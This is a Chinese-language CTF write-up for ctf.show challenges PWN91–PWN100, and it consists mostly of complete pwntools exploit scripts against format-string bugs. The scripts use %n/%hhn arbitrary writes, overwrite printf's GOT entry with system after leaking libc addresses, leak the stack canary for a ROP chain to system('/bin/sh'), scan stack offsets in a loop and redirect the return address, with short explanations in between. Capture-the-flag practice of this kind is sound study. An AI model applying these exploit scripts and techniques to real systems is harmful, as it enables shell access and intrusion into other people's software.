PWN91
简单的格式化字符串。
通过反汇编代码可以看出只要 daniu==6就能getshell
通过调试可以看到偏移为7
最终exp为
from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='i386', os='linux')
# context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./pwn"
# io = remote("pwn.challenge.ctf.show", 28221)
io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc/libc-2.23.so")
s = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(delim, data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(delim, data)
r = lambda num=4096 :io.recv(num)
ru = lambda delims :io.recvuntil(delims)
itr = lambda :io.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
lg = lambda address,data :log.success('%s: '%(address)+hex(data))
gadget = [0x45216,0x4526a,0xf02a4,0xf1147]
ru(b" * ************************************* ")
daniu = 0x0804B038
payload = p32(daniu)+b"%2c%7$hhn"
# gdb.attach(io)
sl(payload)
itr()
PWN92
运行直接输入%s
,就能拿flag
PWN93
这里演示了各种基本用法,gdb调试跟进就可以了。我这里没调试,直接看了汇编代码。
输入7
拿flag
PWN94
基础格式化
这些数据都可以通过调试算出来。
from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='i386', os='linux')
# context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./pwn"
io = remote("pwn.challenge.ctf.show", 28238)
# io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc/libc-2.23.so")
s = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(delim, data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(delim, data)
r = lambda num=4096 :io.recv(num)
ru = lambda delims :io.recvuntil(delims)
itr = lambda :io.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
lg = lambda address,data :log.success('%s: '%(address)+hex(data))
gadget = [0x45216,0x4526a,0xf02a4,0xf1147]
ru(b" * ************************************* ")
system_addr = elf.plt['system']
printf_got = elf.got['printf']
payload = p32(printf_got+2)+p32(printf_got)+b"%2044c%6$hn"+b"%31740c%7$hn"
# gdb.attach(io)
sl(payload)
sl(b"/bin/sh;")
itr()
PWN95
思路
先确定偏移,然后泄露libc,最后改printf的got表为system。
exp为:
from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='i386', os='linux')
# context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./pwn"
io = remote("pwn.challenge.ctf.show", 28306)
# io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc/libc-2.23.so")
s = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(delim, data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(delim, data)
r = lambda num=4096 :io.recv(num)
ru = lambda delims :io.recvuntil(delims)
itr = lambda :io.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
lg = lambda address,data :log.success('%s: '%(address)+hex(data))
gadget = [0x45216,0x4526a,0xf02a4,0xf1147]
ru(b" * ************************************* ")
puts_got = elf.got['puts']
printf_got = elf.got['printf']
payload = p32(puts_got)+b"%6$s"
# gdb.attach(io)
sl(payload)
puts_addr = u32(io.recvuntil(b"\xf7")[-4:])
libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr-libc.dump("puts")
system_addr = libc_base+libc.dump("system")
print("libc_base------------>: ",hex(libc_base))
payload = fmtstr_payload(6,{printf_got:system_addr},numbwritten=0)
sl(payload)
sl(b"/bin/sh;")
itr()
PWN96
exp:
from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='i386', os='linux')
# context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./pwn"
io = remote("pwn.challenge.ctf.show", 28172)
# io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc/libc-2.23.so")
s = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(delim, data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(delim, data)
r = lambda num=4096 :io.recv(num)
ru = lambda delims :io.recvuntil(delims)
itr = lambda :io.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
lg = lambda address,data :log.success('%s: '%(address)+hex(data))
gadget = [0x45216,0x4526a,0xf02a4,0xf1147]
ru(b"Where is the flag?")
puts_got = elf.got['puts']
print_got = elf.got['printf']
payload = p32(puts_got)+b"%22$s"
# gdb.attach(io)
sl(payload)
puts_addr = u32(io.recvuntil(b"\xf7")[-4:])
libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr-libc.dump("puts")
print("libc_base------------>: ",hex(libc_base))
system_addr = libc_base+libc.dump("system")
payload = fmtstr_payload(22,{print_got:system_addr},numbwritten=0)
sl(payload)
sl(b"/bin/sh")
itr()
PWN97
from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='i386', os='linux')
# context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./pwn"
io = remote("pwn.challenge.ctf.show", 28158)
# io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc/libc-2.23.so")
s = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(delim, data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(delim, data)
r = lambda num=4096 :io.recv(num)
ru = lambda delims :io.recvuntil(delims)
itr = lambda :io.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
lg = lambda address,data :log.success('%s: '%(address)+hex(data))
gadget = [0x45216,0x4526a,0xf02a4,0xf1147]
ru(b"$")
check_addr = 0x0804B040
payload = p32(check_addr)+b"%11$hhn"
sl(payload)
itr()
PWN98
脑残了,没后门函数的题打习惯了,这题有后面函数就简单了很多。
from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='i386', os='linux')
# context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./pwn"
io = remote("pwn.challenge.ctf.show", 28199)
# io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc/libc-2.23.so")
s = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(delim, data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(delim, data)
r = lambda num=4096 :io.recv(num)
ru = lambda delims :io.recvuntil(delims)
itr = lambda :io.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
lg = lambda address,data :log.success('%s: '%(address)+hex(data))
gadget = [0x45216,0x4526a,0xf02a4,0xf1147]
ru(b" * ************************************* ")
#======================= leak
puts_got = elf.got['puts']
payload = p32(puts_got)+b"%5$s.%15$p"
sl(payload)
puts_addr = u32(io.recvuntil(b"\xf7")[-4:])
libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr-libc.dump("puts")
ru(b"0x")
canary = int(r(8),16)
print("libc_base------------>: ",hex(libc_base))
print("canary----------------->; ",hex(canary))
#====================== HACK!
system_addr = libc_base+libc.dump("system")
binsh = libc_base+libc.dump("str_bin_sh")
payload = b"a"*(0x34-12)+p32(canary)+p32(0)*3+p32(system_addr)+p32(0x0804876B)+p32(binsh)
sl(payload)
itr()
PWN99
方法一
暴力泄露
payload = b"a"*8+b"%p.%p"*2000
方法二
用脚本扫描
from pwn import *
context.log_level = 'error'
def leak(payload):
io = remote('pwn.challenge.ctf.show',28216)
io.recv()
io.sendline(payload)
data = io.recvuntil('\n', drop=True)
if data.startswith(b'0x'):
print(p64(int(data, 16)))
io.close()
i = 1
while 1:
sleep(0.1)
payload = '%{}$p'.format(i)
leak(payload)
i += 1
PWN100
get_flag()中close(1)关闭了标准输出有点难崩,所以我们不能直接用get_flag()函数。
fmt_attack()函数中由于a1的存在只能用一次,所以我们也要改a1的值。
思路:
通过改返回地址,直接泄露flag
在fmt_attack()函数中call printf前下断点。如下图.
序号1是我们要泄露的地址,利用泄露后的地址减去0x28就能改返回地址。
%7$n是把a1改为0,使得可以再次利用fmt_attack()函数
fmt_attack(b'%7$n-%16$p')
io.recvuntil('-')
ret_addr=int(io.recvuntil(b'\n')[:-1],16)-0x28
print("ret_addr---------->: ",hex(ret_addr))
之后我们还要泄露main_base的地址
payload = b"%7$hn"+b"%p"*0x20
fmt_attack(payload)
r(216) #远程要改为212
main_addr = int(r(12),16)-118-elf.sym['main']
print("main_addr-------->: ",hex(main_addr))
最后就是攻击了
payload1 = b'%3926c%10$hn'
payload1 = payload1.ljust(0x10,b'a')
payload1 += p64(ret_addr)
sla(b'>>',b"2")
sl(payload1)
改前
改后:
可以清楚看到已经改好了返回地址,
完整exp如下:
from pwn import *
from LibcSearcher import *
# context(log_level='debug',arch='i386', os='linux')
context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./pwn"
# io = remote("pwn.challenge.ctf.show", 28279)
io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc/buu_libc-2.23_64.so")
s = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(delim, data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(delim, data)
r = lambda num=4096 :io.recv(num)
ru = lambda delims :io.recvuntil(delims)
itr = lambda :io.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
lg = lambda address,data :log.success('%s: '%(address)+hex(data))
gadget = [0x45216,0x4526a,0xf02a4,0xf1147]
sla(b"What time is it :",b"10 20 20")
def leak(data):
sla(b'>>',b"1")
sl(data)
def fmt_attack(data):
sla(b'>>',b"2")
sl(data)
fmt_attack(b'%7$n-%16$p')
io.recvuntil('-')
ret_addr=int(io.recvuntil(b'\n')[:-1],16)-0x28
print("ret_addr---------->: ",hex(ret_addr))
payload = b"%7$hn"+b"%p"*0x20
fmt_attack(payload)
r(216) #这里是本地打的,远程要改为r(212)
main_addr = int(r(12),16)-118-elf.sym['main']
print("main_addr-------->: ",hex(main_addr))
payload1 = b'%'+str((main_addr+0xf56)&0xffff).encode()+b'c%10$hn'
payload1 = payload1.ljust(0x10,b'a')
payload1 += p64(ret_addr)
sla(b'>>',b"2")
# gdb.attach(io)
sl(payload1)
itr()